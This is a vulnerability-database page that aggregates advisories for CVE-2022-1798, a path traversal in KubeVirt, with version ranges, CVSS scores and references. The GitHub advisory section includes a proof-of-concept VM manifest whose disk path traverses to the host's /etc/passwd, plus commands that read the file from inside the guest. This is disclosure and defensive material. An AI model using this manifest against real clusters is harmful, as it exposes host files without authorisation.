"product_name", name: "Enterprise Linux", }, { branches: [ { category: "product_version_range", name: "Virtualization < 4.10.5", product: { name: "Red Hat OpenShift Virtualization < 4.10.5", product_id: "T024475", }, }, { category: "product_version", name: "GitOps 1.8", product: { name: "Red Hat OpenShift GitOps 1.8", product_id: "T026902", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:gitops_1.8", }, }, }, { category: "product_version", name: "GitOps 1.9", product: { name: "Red Hat OpenShift GitOps 1.9", product_id: "T028023", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:gitops_1.9", }, }, }, ], category: "product_name", name: "OpenShift", }, ], category: "vendor", name: "Red Hat", }, { branches: [ { category: "product_name", name: "SUSE Linux", product: { name: "SUSE Linux", product_id: "T002207", product_identification_helper: { cpe: "cpe:/o:suse:suse_linux:-", }, }, }, ], category: "vendor", name: "SUSE", }, ], }, vulnerabilities: [ { cve: "CVE-2022-1798", notes: [ { category: "description", text: "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht, weil es möglich ist, die kubeVirt-API zu nutzen, um auf Host-Dateien in einer KubeVirt-VM zuzugreifen. Ein entfernter, authentisierter Angreifer kann diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen.", }, ], product_status: { known_affected: [ "T028023", "T002207", "67646", "T026902", "398363", "T026436", ], }, release_date: "2022-09-06T22:00:00.000+00:00", title: "CVE-2022-1798", }, { cve: "CVE-2022-1996", notes: [ { category: "description", text: "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht aufgrund eines benutzergesteuerten Schlüssels im GitHub-Repository emicklei/go-restful. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um die Sicherheitsmaßnahmen zu umgehen.", }, ], product_status: { known_affected: [ "T028023", "T002207", "67646", "T026902", "398363", "T026436", ], }, release_date: "2022-09-06T22:00:00.000+00:00", title: "CVE-2022-1996", }, ], }
gsd-2022-1798
Vulnerability from gsd
Modified
2023-12-13 01:19
Details
A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.
Aliases
Aliases
{ GSD: { alias: "CVE-2022-1798", description: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", id: "GSD-2022-1798", references: [ "https://www.suse.com/security/cve/CVE-2022-1798.html", "https://access.redhat.com/errata/RHSA-2022:6351", "https://access.redhat.com/errata/RHSA-2022:6526", "https://access.redhat.com/errata/RHSA-2022:6681", "https://access.redhat.com/errata/RHSA-2022:6890", "https://access.redhat.com/errata/RHSA-2023:0408", ], }, gsd: { metadata: { exploitCode: "unknown", remediation: "unknown", reportConfidence: "confirmed", type: "vulnerability", }, osvSchema: { aliases: [ "CVE-2022-1798", ], details: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", id: "GSD-2022-1798", modified: "2023-12-13T01:19:28.118584Z", schema_version: "1.4.0", }, }, namespaces: { "cve.org": { CVE_data_meta: { ASSIGNER: "security@google.com", ID: "CVE-2022-1798", STATE: "PUBLIC", TITLE: "Path Traversal vulnerability in Kubevirt", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Kubevirt", version: { version_data: [ { platform: "all", version_affected: "<", version_value: "0.55.1", }, { platform: "all", version_affected: "<", version_value: "0.56.0", }, ], }, }, ], }, vendor_name: "Google LLC", }, ], }, }, credit: [ { lang: "eng", value: "Oliver Brooks and James Klopchic of NCC Group", }, { lang: "eng", value: "Diane Dubois and Roman Mohr of Google", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: { cvss: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 8.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-20 Improper Input Validation", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", refsource: "CONFIRM", url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, ], }, source: { discovery: "EXTERNAL", }, }, "gitlab.com": { advisories: [ { affected_range: ">=0.20.0 <0.55.1", affected_versions: "All versions starting from 0.20.0 before 0.55.1", cvss_v3: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", cwe_ids: [ "CWE-1035", "CWE-22", "CWE-937", ], date: "2022-09-19", description: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", fixed_versions: [ "0.55.1", ], identifier: "CVE-2022-1798", identifiers: [ "CVE-2022-1798", "GHSA-qv98-3369-g364", ], not_impacted: "", package_slug: "go/github.com/kubevirt/kubevirt", pubdate: "2022-09-15", solution: "Upgrade to version 0.55.1 or above.", title: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", urls: [ "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", ], uuid: "53248d19-699a-448b-8098-ab304adcac1a", }, { affected_range: "<=0.53", affected_versions: "All versions up to 0.53", cwe_ids: [ "CWE-1035", "CWE-352", "CWE-937", ], date: "2022-08-18", description: "Relative Path Traversal in kubevirt.io/kubevirt.", fixed_versions: [], identifier: "GMS-2022-3668", identifiers: [ "GHSA-cvx8-ppmc-78hm", "GMS-2022-3668", "CVE-2022-1798", ], not_impacted: "", package_slug: "go/kubevirt.io/kubevirt", pubdate: "2022-08-18", solution: "Unfortunately, there is no solution available yet.", title: "Relative Path Traversal", urls: [ "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", "https://github.com/advisories/GHSA-cvx8-ppmc-78hm", ], uuid: "815806e6-b8e2-4abd-8822-0be903839c27", }, ], }, "nvd.nist.gov": { configurations: { CVE_data_version: "4.0", nodes: [ { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", cpe_name: [], versionEndExcluding: "0.55.1", versionStartIncluding: "0.20.0", vulnerable: true, }, ], operator: "OR", }, ], }, cve: { CVE_data_meta: { ASSIGNER: "security@google.com", ID: "CVE-2022-1798", }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "en", value: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "en", value: "CWE-22", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", refsource: "CONFIRM", tags: [ "Exploit", "Mitigation", "Patch", "Third Party Advisory", ], url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, ], }, }, impact: { baseMetricV3: { cvssV3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, exploitabilityScore: 2, impactScore: 4, }, }, lastModifiedDate: "2022-09-19T18:52Z", publishedDate: "2022-09-15T16:15Z", }, }, }
ghsa-cvx8-ppmc-78hm
Vulnerability from github
Published
2022-08-18 19:02
Modified
2022-09-30 00:44
Severity ?
Summary
Duplicate Advisory: KubeVirt arbitrary host file read from the VM
Details
Duplicate Advisory
This advisory is a duplicate of GHSA-qv98-3369-g364. This link is maintained to preserve external references.
Original Description
Summary As part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.
The read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.
Severity
Moderate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.
Proof of Concept
The initial VMI specifications can be written as such to reproduce the issue:
```
apiVersion: kubevirt.io/v1 kind: VirtualMachineInstance metadata: name: vmi-fedora spec: domain: devices: disks: - disk: bus: virtio name: containerdisk - disk: bus: virtio name: cloudinitdisk - disk: bus: virtio name: containerdisk1 rng: {} resources: requests: memory: 1024M terminationGracePeriodSeconds: 0 volumes: - containerDisk: image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0 name: containerdisk - containerDisk: image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0 path: test3/../../../../../../../../etc/passwd name: containerdisk1 - cloudInitNoCloud: userData: | #!/bin/sh echo 'just something to make cirros happy' name: cloudinitdisk
``` The VMI can then be started through kubectl apply -f vm-test-ncc.yaml. The requested file is accessible once the VM is up and can be accessed under /dev/vdc.
Depending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure. Restrictions
SELinux may mitigate this vulnerability.
When using a node with selinux, selinux denies the access and the VM start was aborted:
```
19s Warning SyncFailed virtualmachineinstance/vmi-fedora server error. command SyncVMI failed: "preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied"
type=AVC msg=audit(1651828898.296:1266): avc: denied { setattr } for pid=44402 comm="rpc-worker" name="passwd" dev="vda1" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1
```
After making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:
```
$ sudo cat /dev/vdc root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...]
```
Further Analysis In order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go
Timeline Date reported: 05/10/2022 Date fixed: N/A Date disclosed: 08/08/2022
{ affected: [ { package: { ecosystem: "Go", name: "kubevirt.io/kubevirt", }, ranges: [ { events: [ { introduced: "0.20.0", }, { fixed: "0.55.1", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2022-1798", ], database_specific: { cwe_ids: [ "CWE-22", ], github_reviewed: true, github_reviewed_at: "2022-08-18T19:02:18Z", nvd_published_at: "2022-09-15T16:15:00Z", severity: "MODERATE", }, details: "## Duplicate Advisory\nThis advisory is a duplicate of [GHSA-qv98-3369-g364](https://github.com/advisories/GHSA-qv98-3369-g364). This link is maintained to preserve external references.\n\n## Original Description\n\n**Summary**\nAs part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.\n\nThe read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.\n\n**Severity**\n\nModerate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.\n\n**Proof of Concept**\n\nThe initial VMI specifications can be written as such to reproduce the issue:\n\n```\n\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n name: vmi-fedora\nspec:\n domain:\n devices:\n disks:\n - disk:\n bus: virtio\n name: containerdisk\n - disk:\n bus: virtio\n name: cloudinitdisk\n - disk:\n bus: virtio\n name: containerdisk1\n rng: {}\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n name: containerdisk\n - containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n path: test3/../../../../../../../../etc/passwd\n name: containerdisk1\n - cloudInitNoCloud:\n userData: |\n #!/bin/sh\n echo 'just something to make cirros happy'\n name: cloudinitdisk\n\n\n```\nThe VMI can then be started through kubectl apply -f vm-test-ncc.yaml.\nThe requested file is accessible once the VM is up and can be accessed under /dev/vdc.\n\nDepending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure.\nRestrictions \n\nSELinux may mitigate this vulnerability.\n\nWhen using a node with selinux, selinux denies the access and the VM start was aborted:\n\n```\n\n19s Warning SyncFailed virtualmachineinstance/vmi-fedora server error. command SyncVMI failed: \"preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied\"\n\ntype=AVC msg=audit(1651828898.296:1266): avc: denied { setattr } for pid=44402 comm=\"rpc-worker\" name=\"passwd\" dev=\"vda1\" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1\n\n```\n\nAfter making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:\n\n```\n\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n\n```\n\n**Further Analysis**\nIn order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go\n\n**Timeline**\nDate reported: 05/10/2022\nDate fixed: N/A\nDate disclosed: 08/08/2022", id: "GHSA-cvx8-ppmc-78hm", modified: "2022-09-30T00:44:46Z", published: "2022-08-18T19:02:18Z", references: [ { type: "WEB", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, { type: "WEB", url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { type: "PACKAGE", url: "https://github.com/kubevirt/kubevirt", }, ], schema_version: "1.4.0", severity: [ { score: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", type: "CVSS_V3", }, ], summary: "Duplicate Advisory: KubeVirt arbitrary host file read from the VM", withdrawn: "2022-09-30T00:44:46Z", }
fkie_cve-2022-1798
Vulnerability from fkie_nvd
Published
2022-09-15 16:15
Modified
2024-11-21 06:41
Severity ?
8.7 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H
6.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
6.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Summary
A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve-coordination@google.com | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364 | Exploit, Mitigation, Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364 | Exploit, Mitigation, Patch, Third Party Advisory |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", matchCriteriaId: "E3E349C1-0216-47B4-B160-13C5B99BC633", versionEndExcluding: "0.55.1", versionStartIncluding: "0.20.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", }, { lang: "es", value: "Una vulnerabilidad de salto de ruta en KubeVirt versiones hasta 0.56 (y 0.55.1) en todas las plataformas permite a un usuario capaz de configurar el kubevirt para leer archivos arbitrarios en el sistema de archivos del host que son legibles públicamente o que son legibles para UID 107 o GID 107. /proc/self/() no es accesible", }, ], id: "CVE-2022-1798", lastModified: "2024-11-21T06:41:29.633", metrics: { cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 8.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H", version: "3.1", }, exploitabilityScore: 2, impactScore: 6, source: "cve-coordination@google.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, exploitabilityScore: 2, impactScore: 4, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2022-09-15T16:15:10.107", references: [ { source: "cve-coordination@google.com", tags: [ "Exploit", "Mitigation", "Patch", "Third Party Advisory", ], url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Mitigation", "Patch", "Third Party Advisory", ], url: "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", }, ], sourceIdentifier: "cve-coordination@google.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-20", }, ], source: "cve-coordination@google.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-22", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Log in or create an account to share your comment.
Security Advisory comment format.
This schema specifies the format of a comment related to a security advisory.
UUIDv4 of the comment
UUIDv4 of the Vulnerability-Lookup instance
When the comment was created originally
When the comment was last updated
Title of the comment
Description of the comment
The identifier of the vulnerability (CVE ID, GHSA-ID, PYSEC ID, etc.).
Loading…
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.